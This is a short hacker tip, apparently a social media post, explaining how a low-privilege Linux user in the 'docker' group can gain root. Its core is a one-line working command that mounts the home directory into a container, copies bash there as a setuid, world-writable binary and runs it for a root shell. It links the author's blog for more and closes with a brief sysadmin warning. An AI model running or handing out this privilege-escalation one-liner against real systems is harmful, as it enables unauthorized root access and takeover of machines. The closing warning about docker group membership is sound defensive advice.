HACKER TIP: If you pop a low-priv linux shell. Don't forget to check if the user is in the "docker" group. If so, a root shell is only one line away:

$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

screenshots and more here on my (crappy) blog: http://zacharykeeton.com/Linux_Privilege-Escalation-with-Docker/

SysAdmin tip: Don' t add any nonsudoers to the 'docker' group!